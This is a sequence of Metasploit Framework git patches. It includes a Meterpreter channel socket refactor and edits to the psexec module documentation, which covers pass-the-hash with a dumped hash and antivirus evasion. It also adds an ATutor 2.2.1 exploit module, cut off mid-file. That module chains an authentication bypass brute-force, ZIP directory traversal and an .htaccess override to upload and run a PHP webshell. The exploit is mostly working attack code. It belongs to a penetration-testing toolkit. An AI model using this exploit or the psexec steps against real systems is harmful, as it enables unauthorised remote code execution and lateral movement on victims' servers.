StreamAbstraction - - ### - # - # Extension information for required Stream interface. - # - ### - module Ext - - # - # Initializes peer information. - # - def initinfo(peer,local) - @peer = peer - @local = local - end - - # - # Symbolic peer information. - # - def peerinfo - (@peer || "Remote Pipe") - end - - # - # Symbolic local information. - # - def localinfo - (@local || "Local Pipe") - end - end + include Rex::IO::SocketAbstraction # # This method creates a streaming socket pair and initializes it. @@ -53,156 +23,9 @@ module StreamAbstraction self.lsock.extend(Ext) self.rsock.extend(Rex::IO::Stream) - self.monitor_rsock + self.monitor_rsock("StreamMonitorRemote") end - # - # This method cleans up the abstraction layer. - # - def cleanup_abstraction - self.lsock.close if (self.lsock) - self.rsock.close if (self.rsock) - - self.lsock = nil - self.rsock = nil - end - - # - # Low-level write to the local side. - # - def syswrite(buffer) - lsock.syswrite(buffer) - end - - # - # Low-level read from the local side. - # - def sysread(length) - lsock.sysread(length) - end - - # - # Shuts down the local side of the stream abstraction. - # - def shutdown(how) - lsock.shutdown(how) - end - - # - # Closes both sides of the stream abstraction. - # - def close - cleanup_abstraction - end - - # - # Symbolic peer information. - # - def peerinfo - "Remote-side of Pipe" - end - - # - # Symbolic local information. - # - def localinfo - "Local-side of Pipe" - end - - # - # The left side of the stream. - # - attr_reader :lsock - # - # The right side of the stream. - # - attr_reader :rsock - -protected - - def monitor_rsock - self.monitor_thread = Rex::ThreadFactory.spawn("StreamMonitorRemote", false) { - loop do - closed = false - buf = nil - - if not self.rsock - wlog("monitor_rsock: the remote socket is nil, exiting loop") - break - end - - begin - s = Rex::ThreadSafe.select( [ self.rsock ], nil, nil, 0.2 ) - if( s == nil || s[0] == nil ) - next - end - rescue Exception => e - wlog("monitor_rsock: exception during select: #{e.class} #{e}") - closed = true - end - - if( closed == false ) - begin - buf = self.rsock.sysread( 32768 ) - if buf == nil - closed = true - wlog("monitor_rsock: closed remote socket due to nil read") - end - rescue EOFError => e - closed = true - dlog("monitor_rsock: EOF in rsock") - rescue ::Exception => e - closed = true - wlog("monitor_rsock: exception during read: #{e.class} #{e}") - end - end - - if( closed == false ) - total_sent = 0 - total_length = buf.length - while( total_sent < total_length ) - begin - data = buf[total_sent, buf.length] - - # Note that this must be write() NOT syswrite() or put() or anything like it. - # Using syswrite() breaks SSL streams. - sent = self.write( data ) - - # sf: Only remove the data off the queue is write was successfull. - # This way we naturally perform a resend if a failure occured. - # Catches an edge case with meterpreter TCP channels where remote send - # failes gracefully and a resend is required. - if (sent.nil?) - closed = true - wlog("monitor_rsock: failed writing, socket must be dead") - break - elsif (sent > 0) - total_sent += sent - end - rescue ::IOError, ::EOFError => e - closed = true - wlog("monitor_rsock: exception during write: #{e.class} #{e}") - break - end - end - end - - if( closed ) - begin - self.close_write if self.respond_to?('close_write') - rescue IOError - end - break - end - end - } - end - -protected - attr_accessor :monitor_thread - attr_writer :lsock - attr_writer :rsock - end end; end diff --git a/lib/rex/post/meterpreter/channels/datagram.rb b/lib/rex/post/meterpreter/channels/datagram.rb new file mode 100644 index 0000000000..3cb33b1660 --- /dev/null +++ b/lib/rex/post/meterpreter/channels/datagram.rb @@ -0,0 +1,75 @@ +# -*- coding: binary -*- + +require 'rex/io/datagram_abstraction' +require 'rex/post/meterpreter/channels/socket_abstraction' + +module Rex +module Post +module Meterpreter + +### +# +# Stream +# ------ +# +# This class represents a channel that is streaming. This means +# that sequential data is flowing in either one or both directions. +# +### +class Datagram < Rex::Post::Meterpreter::Channel + + include Rex::Post::Meterpreter::SocketAbstraction + include Rex::IO::DatagramAbstraction + + class << self + def cls + return CHANNEL_CLASS_DATAGRAM + end + end + + module SocketInterface + include Rex::Post::Meterpreter::SocketAbstraction::SocketInterface + def type? + 'udp' + end + + def recvfrom_nonblock(length,flags = nil) + return [super(length, flags)[0], super(length, flags)[0]] + end + + def send( buf, flags, saddr ) + channel.send( buf, flags, saddr) + end + end + + def dio_write_handler( packet, data ) + @recvd ||= [] + @recvd << [packet, data] + peerhost = packet.get_tlv_value( + Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_PEER_HOST + ) + peerport = packet.get_tlv_value( + Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_PEER_PORT + ) + + if( peerhost and peerport ) + # Maxlen here is 65507, to ensure we dont overflow, we need to write twice + # If the other side has a full 64k, handle by splitting up the datagram and + # writing multiple times along with the sockaddr. Consumers calling recvfrom + # repeatedly will buffer up all the pieces. + while data.length > 65507 + rsock.syswrite(data[0..65506]) + rsock.syswrite(Rex::Socket.to_sockaddr(peerhost,peerport)) + data = data - data[0..65506] + end + rsock.syswrite(data) + rsock.syswrite(Rex::Socket.to_sockaddr(peerhost,peerport)) + return true + else + return false + end + end + +end + +end; end; end diff --git a/lib/rex/post/meterpreter/channels/socket_abstraction.rb b/lib/rex/post/meterpreter/channels/socket_abstraction.rb new file mode 100644 index 0000000000..8ec61ff2ac --- /dev/null +++ b/lib/rex/post/meterpreter/channels/socket_abstraction.rb @@ -0,0 +1,161 @@ +# -*- coding: binary -*- + +# require 'rex/io/socket_abstraction' +require 'rex/post/meterpreter/channel' + +module Rex +module Post +module Meterpreter + +### +# +# Abstraction +# ------ +# +# This class represents a channel that is streaming. This means +# that sequential data is flowing in either one or both directions. +# +### +module SocketAbstraction + + # include Rex::IO::SocketAbstraction + + class << self + def cls + raise NotImplementedError + end + end + + module SocketInterface + def type? + raise NotImplementedError + end + + def getsockname + return super if not channel + # Find the first host in our chain (our address) + hops = 0 + csock = channel.client.sock + while(csock.respond_to?('channel')) + csock = csock.channel.client.sock + hops += 1 + end + tmp,caddr,cport = csock.getsockname + tmp,raddr,rport = csock.getpeername + maddr,mport = [ channel.params.localhost, channel.params.localport ] + [ tmp, "#{caddr}#{(hops > 0) ? "-_#{hops}_" : ""}-#{raddr}", "#{mport}" ] + end + + def getpeername + return super if not channel + tmp,caddr,cport = channel.client.sock.getpeername + maddr,mport = [ channel.params.peerhost, channel.params.peerport ] + [ tmp, "#{maddr}", "#{mport}" ] + end + + %w{localhost localport peerhost peerport}.map do |meth| + define_method(meth.to_sym) { + return super if not channel + channel.params.send(meth.to_sym) + } + end + + def close + super + channel.cleanup_abstraction + channel.close + end + + attr_accessor :channel + end + + # + # Simple mixin for lsock in order to help avoid a ruby interpreter issue with ::Socket.pair + # Instead of writing to the lsock, reading from the rsock and then writing to the channel, + # we use this mixin to directly write to the channel. + # + # Note: This does not work with OpenSSL as OpenSSL is implemented natively and requires a real + # socket to write to and we cant intercept the sockets syswrite at a native level. + # + # Note: The deadlock only seems to effect the Ruby build for cygwin. + # + module DirectChannelWrite + + def syswrite( buf ) + channel._write( buf ) + end + + attr_accessor :channel + end + ## + # + # Constructor + # + ## + + # + # Passes the initialization information up to the base class + # + def initialize(client, cid, type, flags) + # sf: initialize_abstraction() before super() as we can get a scenario where dio_write_handler() is called + # with data to write to the rsock but rsock has not yet been initialized. This happens if the channel + # is registered (client.add_channel(self) in Channel.initialize) to a session and a 'core_channel_write' + # request comes in before we have called self.initialize_abstraction() + initialize_abstraction + super(client, cid, type, flags) + end + + ## + # + # Remote I/O handlers + # + ## + + # + # Performs a write operation on the right side of the local stream. + # + def dio_write_handler(packet, data) + rv = Rex::ThreadSafe.select(nil, [rsock], nil, 0.01) + if(rv) + rsock.syswrite(data) + return true + else + return false + end + end + + # + # Performs a close operation on the right side of the local stream. + # + def dio_close_handler(packet) + rsock.close + + return super(packet) + end + + # + # Cleans up the stream abstraction. + # + def cleanup + super + + cleanup_abstraction + end + + # + # Wrap the _write() call in order to catch some common, but harmless Windows exceptions + # + def _write(*args) + begin + super(*args) + rescue ::Rex::Post::Meterpreter::RequestError => e + case e.code + when 10000 .. 10100 + raise ::Rex::ConnectionError.new + end + end + end + +end + +end; end; end diff --git a/lib/rex/post/meterpreter/channels/stream.rb b/lib/rex/post/meterpreter/channels/stream.rb index 95c1e48e6e..09e1f86b3c 100644 --- a/lib/rex/post/meterpreter/channels/stream.rb +++ b/lib/rex/post/meterpreter/channels/stream.rb @@ -1,7 +1,7 @@ # -*- coding: binary -*- require 'rex/io/stream_abstraction' -require 'rex/post/meterpreter/channel' +require 'rex/post/meterpreter/channels/socket_abstraction' module Rex module Post @@ -18,6 +18,7 @@ module Meterpreter ### class Stream < Rex::Post::Meterpreter::Channel + include Rex::Post::Meterpreter::SocketAbstraction include Rex::IO::StreamAbstraction class << self @@ -26,61 +27,13 @@ class Stream < Rex::Post::Meterpreter::Channel end end - ## - # - # Constructor - # - ## - - # - # Passes the initialization information up to the base class - # - def initialize(client, cid, type, flags) - # sf: initialize_abstraction() before super() as we can get a scenario where dio_write_handler() is called - # with data to write to the rsock but rsock has not yet been initialized. This happens if the channel - # is registered (client.add_channel(self) in Channel.initialize) to a session and a 'core_channel_write' - # request comes in before we have called self.initialize_abstraction() - initialize_abstraction - super(client, cid, type, flags) - end - - ## - # - # Remote I/O handlers - # - ## - - # - # Performs a write operation on the right side of the local stream. - # - def dio_write_handler(packet, data) - rv = Rex::ThreadSafe.select(nil, [rsock], nil, 0.01) - if(rv) - rsock.write(data) - return true - else - return false + module SocketInterface + include Rex::Post::Meterpreter::SocketAbstraction::SocketInterface + def type? + 'tcp' end end - # - # Performs a close operation on the right side of the local stream. - # - def dio_close_handler(packet) - rsock.close - - return super(packet) - end - - # - # Cleans up the stream abstraction. - # - def cleanup - super - - cleanup_abstraction - end - end end; end; end diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb index 950815dbaa..5875c1b11f 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb @@ -118,7 +118,11 @@ class Socket # def create_udp_channel(params) begin - return SocketSubsystem::UdpChannel.open(client, params) + channel = SocketSubsystem::UdpChannel.open(client, params) + if( channel != nil ) + return channel.lsock + end + return nil rescue ::Rex::Post::Meterpreter::RequestError => e case e.code when 10000 .. 10100 diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb index d0127ef158..9574caebc5 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb @@ -23,61 +23,6 @@ module SocketSubsystem ### class TcpClientChannel < Rex::Post::Meterpreter::Stream - class << self - def cls - return CHANNEL_CLASS_STREAM - end - end - - module SocketInterface - def type? - 'tcp' - end - - def getsockname - return super if not channel - # Find the first host in our chain (our address) - hops = 0 - csock = channel.client.sock - while(csock.respond_to?('channel')) - csock = csock.channel.client.sock - hops += 1 - end - tmp,caddr,cport = csock.getsockname - tmp,raddr,rport = csock.getpeername - maddr,mport = [ channel.params.localhost, channel.params.localport ] - [ tmp, "#{caddr}#{(hops > 0) ? "-_#{hops}_" : ""}-#{raddr}", "#{mport}" ] - end - - def getpeername - return super if not channel - tmp,caddr,cport = channel.client.sock.getpeername - maddr,mport = [ channel.params.peerhost, channel.params.peerport ] - [ tmp, "#{maddr}", "#{mport}" ] - end - - attr_accessor :channel - end - - # - # Simple mixin for lsock in order to help avoid a ruby interpreter issue with ::Socket.pair - # Instead of writing to the lsock, reading from the rsock and then writing to the channel, - # we use this mixin to directly write to the channel. - # - # Note: This does not work with OpenSSL as OpenSSL is implemented natively and requires a real - # socket to write to and we cant intercept the sockets syswrite at a native level. - # - # Note: The deadlock only seems to effect the Ruby build for cygwin. - # - module DirectChannelWrite - - def syswrite( buf ) - channel._write( buf ) - end - - attr_accessor :channel - end - ## # # Factory @@ -161,19 +106,6 @@ class TcpClientChannel < Rex::Post::Meterpreter::Stream return true end - # - # Wrap the _write() call in order to catch some common, but harmless Windows exceptions - # - def _write(*args) - begin - super(*args) - rescue ::Rex::Post::Meterpreter::RequestError => e - case e.code - when 10000 .. 10100 - raise ::Rex::ConnectionError.new - end - end - end end end; end; end; end; end; end; end diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb index f8e7f310e0..dda93f0040 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb @@ -5,6 +5,7 @@ require 'rex/socket/udp' require 'rex/socket/parameters' require 'rex/post/meterpreter/extensions/stdapi/tlv' require 'rex/post/meterpreter/channel' +require 'rex/post/meterpreter/channels/datagram' module Rex module Post @@ -14,12 +15,7 @@ module Stdapi module Net module SocketSubsystem -class UdpChannel < Rex::Post::Meterpreter::Channel - - # - # We inclue Rex::Socket::Udp as this channel is effectivly a UDP socket. - # - include Rex::Socket::Udp +class UdpChannel < Rex::Post::Meterpreter::Datagram # # We are a datagram channel. @@ -64,89 +60,19 @@ class UdpChannel < Rex::Post::Meterpreter::Channel # # Simply initialize this instance. # - def initialize(client, cid, type, flags) - super(client, cid, type, flags) - # the instance variable that holds all incoming datagrams. - @datagrams = [] - end + def initialize( client, cid, type, flags ) + super( client, cid, type, flags ) - # - # We overwrite Rex::Socket::Udp.timed_read in order to avoid the call to Kernel.select - # which wont be of use as we are not a natively backed ::Socket or ::IO instance. - # - def timed_read( length=65535, timeout=def_read_timeout ) - result = '' + lsock.extend( Rex::Socket::Udp ) + lsock.initsock + lsock.extend( SocketInterface ) + lsock.extend( DirectChannelWrite ) + lsock.channel = self - begin - Timeout.timeout( timeout ) { - while( true ) - if( @datagrams.empty? ) - Rex::ThreadSafe.sleep( 0.2 ) - next - end - result = self.read( length ) - break - end - } - rescue Timeout::Error - result = '' - end + # rsock.extend( Rex::Socket::Udp ) + rsock.extend( SocketInterface ) + rsock.channel = self - return result - end - - # - # We overwrite Rex::Socket::Udp.recvfrom in order to correctly hand out the - # datagrams which the remote end of this channel has received and are in the - # queue. - # - def recvfrom( length=65535, timeout=def_read_timeout ) - result = nil - # force a timeout on the wait for an incoming datagram - begin - Timeout.timeout( timeout ) { - while( true ) - # wait untill we have at least one datagram in the queue - if( @datagrams.empty? ) - Rex::ThreadSafe.sleep( 0.2 ) - next - end - # grab the oldest datagram we have received... - result = @datagrams.shift - # break as we have a result... - break - end - } - rescue Timeout::Error - result = nil - end - # if no result return nothing - if( result == nil ) - return [ '', nil, nil ] - end - # get the data from this datagram - data = result[0] - # if its only a partial read of this datagram, slice it, loosing the remainder. - result[0] = data[0,length-1] if data.length > length - # return the result in the form [ data, host, port ] - return result - end - - # - # Overwrite the low level sysread to read data off our datagram queue. Calls - # to read() will end up calling this. - # - def sysread( length ) - result = self.recvfrom( length ) - return result[0] - end - - # - # Overwrite the low level syswrite to write data to the remote end of the channel. - # Calls to write() will end up calling this. - # - def syswrite( buf ) - return _write( buf ) end # @@ -170,39 +96,6 @@ class UdpChannel < Rex::Post::Meterpreter::Channel return _write( buf, buf.length, addends ) end - # - # The channels direct io write handler for any incoming data from the remote end - # of the channel. We extract the data and peer host/port, and save this to a queue - # of incoming datagrams which are passed out via calls to self.recvfrom() - # - def dio_write_handler( packet, data ) - - peerhost = packet.get_tlv_value( TLV_TYPE_PEER_HOST ) - peerport = packet.get_tlv_value( TLV_TYPE_PEER_PORT ) - - if( peerhost and peerport ) - @datagrams << [ data, peerhost, peerport ] - return true - end - - return false - end - - # - # Wrap the _write() call in order to catch some common, but harmless Windows exceptions - # - def _write(*args) - begin - super(*args) - rescue ::Rex::Post::Meterpreter::RequestError => e - case e.code - when 10000 .. 10100 - raise ::Rex::ConnectionError.new - end - end - end - - end end; end; end; end; end; end; end From 4c42a74d4809b417bd5a21ef90b0c148043c5a61 Mon Sep 17 00:00:00 2001 From: tdoan-r7 Date: Mon, 21 Mar 2016 14:18:16 -0500 Subject: [PATCH 587/686] MS-1195 minor grammatical edits to psexec kb --- .../modules/exploit/windows/smb/psexec.md | 68 +++++++------------ 1 file changed, 23 insertions(+), 45 deletions(-) diff --git a/documentation/modules/exploit/windows/smb/psexec.md b/documentation/modules/exploit/windows/smb/psexec.md index 5fe2abe0c5..de541f95b7 100644 --- a/documentation/modules/exploit/windows/smb/psexec.md +++ b/documentation/modules/exploit/windows/smb/psexec.md @@ -1,24 +1,21 @@ -psexec is one of the most popular exploits against Microsoft Windows. It is a great way to test -password security, and demonstrate how a stolen password could lead to a complete compromise of an -entire corporate network. +psexec is one of the most popular exploits against Microsoft Windows. It is a great way to test password security and demonstrate how a stolen password could lead to a complete compromise of an entire corporate network. -The Metasploit Framework actually includes different module types of psexec for different -scenarios. exploit/windows/smb/psexec is the father of them all, and is used the same way +The Metasploit Framework actually includes different module types of psexec for different scenarios. exploit/windows/smb/psexec is the father of them all and is used the same way you normally would with any Metasploit exploits. ## Vulnerable Application -To be able to use exploit/windows/smb/psexec, you must meet these requirements: +To be able to use exploit/windows/smb/psexec: -1. You have a valid username/password. -2. Firewall allows SMB traffic. -3. Target is using SMBv1. -4. The remote Windows machine's network security policy allows it. If you see [one of these errors](https://github.com/rapid7/metasploit-framework/wiki/What-does-my-Rex%3A%3AProto%3A%3ASMB-Error-mean%3F), it's an indication it doesn't. +1. You must have a valid username/password. +2. The firewall must allow SMB traffic. +3. The target must use SMBv1. +4. The remote Windows machine's network security policy must allow it. If you see [one of these errors](https://github.com/rapid7/metasploit-framework/wiki/What-does-my-Rex%3A%3AProto%3A%3ASMB-Error-mean%3F), then the Windows machine does not allow it. ## Verification Steps -At the minimum, you should be able use psexec to get a session with a valid credential: +At the minimum, you should be able use psexec to get a session with a valid credential using the following: ``` msf > use exploit/windows/smb/psexec @@ -46,34 +43,29 @@ meterpreter > ## Options -By default, exploit/windows/smb/psexec can be as simple as setting the RHOST option, and ready to -go. But in reality, you will probably need to at least configure: +By default, using exploit/windows/smb/psexec can be as simple as setting the RHOST option, and you're ready to go. But in reality, you will probably need to at least configure: **The SMBUser Option** -A valid Windows username. +This is a valid Windows username. **The SMBPass option** -This can be either the plain text version, or the Windows hash. +This can be either the plain text version or the Windows hash. ## Scenarios **Pass the Hash** -One common penetration testing scenario with using psexec is that attackers usually begin by -breaking into a box, manage to the dump the hashes, and use some of those hashes to log into -other boxes on the network using psexec. So let's say I'm in that scenario with the following -stolen hash: +One common penetration testing scenario using psexec is that attackers usually begin by breaking into a box, dumping the hashes, and using some of those hashes to log into other boxes on the network using psexec. So in that scenario, with the following stolen hash: ``` meterpreter > hashdump Administrator:500:e39baff0f2c5fd4e93e28745b8bf4ba6:f4974ee4a935ee160a927eafbb3f317f::: ``` -Without the need to crack the hash, I can simply copy and paste it to the SMBPass option in -psexec, and get a session: +You can simply copy and paste it to the SMBPass option in psexec and get a session without needing to crack the hash: ``` msf > use exploit/windows/smb/psexec @@ -101,42 +93,28 @@ meterpreter > **Automatic Target** -exploit/windows/smb/psexec comes with multiple targets available, and Automatic is default. What -happens under the hood is if Powershell is detected on the remote machine, it will try Powershell, -otherwise it uses the natvie upload. Each target is explained below. +There are multiple targets available for exploit/windows/smb/psexec. The Automatic target is the default target. If the Automatic target detects Powershell on the remote machine, it will try Powershell, otherwise it uses the natvie upload. Each target is explained below. **Powershell Target** -The Powershell target forces the psexec module to run a Powershell command with a payload embedded -in it. Since this approach does not leave anything on disk, it is a very powerful way to evade -antivirus. However, older Windows machines might not support Powershell by default. +The Powershell target forces the psexec module to run a Powershell command with a payload embedded in it. Since this approach does not leave anything on disk, it is a very powerful way to evade antivirus. However, older Windows machines might not support Powershell by default. -Ideally, you probably want to use the Automatic target setting instead of this. Because the -automatic mode will check if the target supports Powershell or not before it tries, but the -manually set Powershell target won't do that. +Because of this, you will probably want to use the Automatic target setting. The automatic mode will check if the target supports Powershell before it tries it; the manually set Powershell target won't do that. **Native Upload Target** -The Native target will attempt to upload the payload (executable) to SYSTEM32 (modifiable with the -SHARE datastore option) , and then execute it with psexec. +The Native target will attempt to upload the payload (executable) to SYSTEM32 (which can be modified with the +SHARE datastore option), and then execute it with psexec. -This approach is rather reliable, but has a high chance of getting caught by antivirus on the -target. To counter this, you can try to use a template by setting the EXE::Path and EXE::Template -datastore options. Or, you can supply your own custom EXE by setting the EXE::Custom option. +This approach is generally reliable, but has a high chance of getting caught by antivirus on the target. To counter this, you can try to use a template by setting the EXE::Path and EXE::Template datastore options. Or, you can supply your own custom EXE by setting the EXE::Custom option. **MOF Upload Target** -The [MOF](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-WbemExec-for-a-write-privilege-attack-on-Windows) target technically does not use psexec: it does not explicitly tell Windows to execute -anything. All it does is uploading two files: the payload (exe) in SYSTEM32, and a managed object -format file in SYSTEM32\wbem\mof\ directory. When Windows sees the mof file in that directory, it -automatically runs it. Once executed, the code inside the mof file basically tells Windows to -execute our payload in SYSTEM32, and we get a session. +The [MOF](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-WbemExec-for-a-write-privilege-attack-on-Windows) target technically does not use psexec; it does not explicitly tell Windows to execute anything. All it does is upload two files: the payload (exe) in SYSTEM32 and a managed object +format file in SYSTEM32\wbem\mof\ directory. When Windows sees the MOF file in that directory, it automatically runs it. Once executed, the code inside the MOF file basically tells Windows to execute our payload in SYSTEM32, and you get a session. -Although a neat trick, Metasploit's MOF library only works against Windows XP and -Windows Server 2003. And since it does write files to disk, there is also a high chance of getting +Although it's a neat trick, Metasploit's MOF library only works against Windows XP and Windows Server 2003. And since it writes files to disk, there is also a high chance of getting caught by antivirus on the target. -The way to counter antivirus is still the same. You can either use a different template by setting -the EXE::Path and EXE::Template datastore options. Or you can supply your own custom EXE by setting -the EXE::Custom option. +The best way to counter antivirus is still the same. You can either use a different template by setting the EXE::Path and EXE::Template datastore options or you can supply your own custom EXE by setting the EXE::Custom option. From 3842009ffe1dabbe01f501901b210caa07713527 Mon Sep 17 00:00:00 2001 From: Steven Seeley Date: Tue, 22 Mar 2016 12:17:32 -0500 Subject: [PATCH 588/686] Add ATutor 2.2.1 Directory Traversal Exploit Module --- .../http/atutor_filemanager_traversal.rb | 370 ++++++++++++++++++ 1 file changed, 370 insertions(+) create mode 100644 modules/exploits/linux/http/atutor_filemanager_traversal.rb diff --git a/modules/exploits/linux/http/atutor_filemanager_traversal.rb b/modules/exploits/linux/http/atutor_filemanager_traversal.rb new file mode 100644 index 0000000000..c1324a07aa --- /dev/null +++ b/modules/exploits/linux/http/atutor_filemanager_traversal.rb @@ -0,0 +1,370 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info={}) + super(update_info(info, + 'Name' => 'ATutor 2.2.1 Directory Traversal / Remote Code Execution', + 'Description' => %q{ + This module exploits a directory traversal vulnerability in ATutor on an Apache/PHP + setup with display_errors set to On, which can be used to allow us to upload a malicious + ZIP file. On the web application, a blacklist verification is performed before extraction, + however it is not sufficient to prevent exploitation. + + You are required to login to the target to reach the vulnerability, however this can be + done as a student account and remote registration is enabled by default. + + Just incase remote registration isnt enabled, this module uses 2 vulnerabilities + in order to bypass the authenication: + + 1. confirm.php Authentication Bypass Type Juggling vulnerability + 2. password_reminder.php Remote Password Reset TOCTOU vulnerability + + ~ spirit of the hack + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'mr_me ', # initial discovery, msf code + ], + 'References' => + [ + [ 'URL', 'http://www.atutor.ca/' ], # Official Website + [ 'URL', 'http://sourceincite.com/research/src-2016-09/' ], # Type Juggling Advisory + [ 'URL', 'http://sourceincite.com/research/src-2016-10/' ], # TOCTOU Advisory + [ 'URL', 'http://sourceincite.com/research/src-2016-11/' ], # Directory Traversal Advisory + [ 'URL', 'https://github.com/atutor/ATutor/pull/107' ] + ], + 'Privileged' => false, + 'Payload' => + { + 'DisableNops' => true, + }, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => [[ 'Automatic', { }]], + 'DisclosureDate' => 'Mar 1 2016', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The path of Atutor', '/ATutor/']), + OptString.new('USERNAME', [false, 'The username to authenticate as']), + OptString.new('PASSWORD', [false, 'The password to authenticate with']) + ],self.class) + end + + def print_status(msg='') + super("#{peer} - #{msg}") + end + + def print_error(msg='') + super("#{peer} - #{msg}") + end + + def print_good(msg='') + super("#{peer} - #{msg}") + end + + def check + # there is no real way to finger print the target so we just + # check if we can upload a zip and extract it into the web root... + # obviously not ideal, but if anyone knows better, feel free to change + if (not datastore['USERNAME'].blank? and not datastore['PASSWORD'].blank?) + student_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], check=true) + if student_cookie != nil && disclose_web_root + begin + if upload_shell(student_cookie, check=true) && found + return Exploit::CheckCode::Vulnerable + end + rescue Msf::Exploit::Failed => e + vprint_error(e.message) + end + else + # if we cant login, it may still be vuln + return Exploit::CheckCode::Unknown + end + else + # if no creds are supplied, it may still be vuln + return Exploit::CheckCode::Unknown + end + return Exploit::CheckCode::Safe + end + + def create_zip_file(check=false) + zip_file = Rex::Zip::Archive.new + @header = Rex::Text.rand_text_alpha_upper(4) + @payload_name = Rex::Text.rand_text_alpha_lower(4) + @archive_name = Rex::Text.rand_text_alpha_lower(3) + @test_string = Rex::Text.rand_text_alpha_lower(8) + # we traverse back into the webroot mods/ directory (since it will be writable) + path = "../../../../../../../../../../../../..#{@webroot}mods/" + + # we use this to give us the best chance of success. If a webserver has htaccess override enabled + # we will win. If not, we may still win because these file extensions are often registered as php + # with the webserver, thus allowing us remote code execution. + if check + zip_file.add_file("#{path}#{@payload_name}.txt", "#{@test_string}") + else + register_file_for_cleanup( ".htaccess", "#{@payload_name}.pht", "#{@payload_name}.php4", "#{@payload_name}.phtml") + zip_file.add_file("#{path}.htaccess", "AddType application/x-httpd-php .phtml .php4 .pht") + zip_file.add_file("#{path}#{@payload_name}.pht", "") + zip_file.add_file("#{path}#{@payload_name}.php4", "") + zip_file.add_file("#{path}#{@payload_name}.phtml", "") + end + zip_file.pack + end + + def found + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "mods", "#{@payload_name}.txt"), + }) + if res.code == 200 and res.body =~ /#{@test_string}/ + return true + end + return false + end + + def disclose_web_root + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "jscripts", "ATutor_js.php"), + }) + @webroot = "/" + @webroot << $1 if res.body =~ /\\/(.*)jscripts\/ATutor_js\.php\<\/b\> / + if @webroot != "/" + return true + end + return false + end + + def exec_code + # pwnage + res = nil + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "mods", "#{@payload_name}.pht"), + 'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n" + }, timeout=0.1) + if res == nil + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "mods", "#{@payload_name}.phtml"), + 'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n" + }, timeout=0.1) + end + if res == nil + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "mods", "#{@payload_name}.php4"), + 'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n" + }, timeout=0.1) + end + end + + def upload_shell(cookie, check) + post_data = Rex::MIME::Message.new + post_data.add_part(create_zip_file(check), 'application/zip', nil, "form-data; name=\"file\"; filename=\"#{@archive_name}.zip\"") + post_data.add_part("#{Rex::Text.rand_text_alpha_upper(4)}", nil, nil, "form-data; name=\"submit_import\"") + data = post_data.to_s + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, "mods", "_standard", "tests", "question_import.php"), + 'method' => 'POST', + 'data' => data, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + 'cookie' => cookie, + 'vars_get' => { + 'h' => '' + } + }) + if res && res.code == 302 && res.redirection.to_s.include?("question_db.php") + return true + end + # unknown failure... + if res && res.body =~ /Missing zlib extensions/ + fail_with(Failure::NotVulnerable, 'Server is missing zlib extensions') + else + fail_with(Failure::Unknown, 'Unable to upload php code') + end + return false + end + + def find_user(cookie) + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "users", "profile.php"), + 'cookie' => cookie, + # we need to set the agent to the same value that was in type_juggle, + # since the bypassed session is linked to the user-agent. We can then + # use that session to leak the username + 'agent' => '' + }) + username = "#{$1}" if res.body =~ /(.*)<\/span>/ + if username + return username + end + # else we fail, because we dont know the username to login as + fail_with(Failure::Unknown, "Unable to find the username!") + end + + def type_juggle + # high padding, means higher success rate + # also, we use numbers, so we can count requests :p + for i in 1..8 + for @number in ('0'*i..'9'*i) + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "confirm.php"), + 'vars_post' => { + 'auto_login' => '', + 'code' => '0' # type juggling + }, + 'vars_get' => { + 'e' => @number, # the bruteforce + 'id' => '', + 'm' => '', + # the default install script creates a member + # so we know for sure, that it will be 1 + 'member_id' => '1' + }, + # need to set the agent, since we are creating x number of sessions + # and then using that session to get leak the username + 'agent' => '' + }, redirect_depth = 0) # to validate a successful bypass + if res and res.code == 302 + cookie = "ATutorID=#{$3};" if res.get_cookies =~ /ATutorID=(.*); ATutorID=(.*); ATutorID=(.*);/ + return cookie + end + end + end + # if we finish the loop and have no sauce, we cant make pasta + fail_with(Failure::Unknown, "Unable to exploit the type juggle and bypass authentication") + end + + def reset_password() + # this is due to line 